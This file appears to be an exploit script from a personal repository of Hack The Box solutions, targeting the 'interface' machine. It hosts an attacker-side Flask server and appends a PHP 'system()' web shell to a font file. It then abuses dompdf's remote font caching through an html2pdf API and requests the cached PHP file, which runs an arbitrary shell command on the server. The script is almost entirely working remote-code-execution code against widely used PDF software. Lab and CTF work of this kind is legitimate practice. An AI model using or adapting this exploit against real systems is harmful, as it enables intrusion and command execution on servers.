simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
82b0759f1e2d4df30661244ea3d6465057d00c5a
CTF/HTB/interface/shell.py
Simon 82b0759f1e init htb 
old htb folders
2023-08-29 21:53:22 +02:00

92 lines
2.1 KiB
Python
Raw Blame History

import hashlib
import os
import subprocess
import sys
import time
from flask import Flask, Response
import requests, base64
import random
from threading import Thread
app = Flask(__name__)
ttf = b""
md5 = ""
with open("exploit_font_template.php", "rb") as file:
ttf = file.read()
cmd = sys.argv[1].encode()
#print(ttf + b"<?php system('" + cmd + b"') ?>")
#exit()
got_php = False
got_css = False
proxy = {'http':'http://127.0.0.1:8080'}
@app.route('/css/<name>')
def css(name):
global md5,got_css
got_css = True
url = f"http://10.10.16.47/exploit/exploit_font{random.randint(0,9999)}.php"
md5 = hashlib.md5(url.encode()).hexdigest()
return Response("""@font-face {
font-family:'exploitfont';
src:url('""" + url + """');
font-weight:'normal';
font-style:'normal';
}""")
@app.route('/exploit/<name>')
def exploit(name):
global ttf, got_php
got_php = True
print(f"cmd = {cmd}")
return ttf + b"<?php system('" + cmd + b"') ?>"
class Server(Thread):
port = 80
cmd = b''
def __int__(self):
super(Server, self).__init__()
def setIP(self, ip):
self.ip = ip
def setPort(self, port):
self.port = port
def setServerObject(self, obj):
self.app = obj
def run(self) -> None:
try:
self.app.run(host=self.ip, port=self.port)
except Exception as e:
print(f"exception: {e}")
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
if __name__ == '__main__':
data = {"html":f"<link rel=stylesheet href='http://10.10.16.47/css/{random.randint(0,99999)}.css'>"}
server = Server()
server.setIP("10.10.16.47")
server.setPort("80")
server.setServerObject(app)
server.start()
time.sleep(0.5)
requests.post("http://prd.m.rendering-api.interface.htb/api/html2pdf", json=data, proxies=proxy)
while not got_php:
pass
r = requests.get(f'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_{md5}.php')
print(r.text[440:])
subprocess.call(['kill', str(os.getpid())])
Reference in New Issue View Git Blame Copy Permalink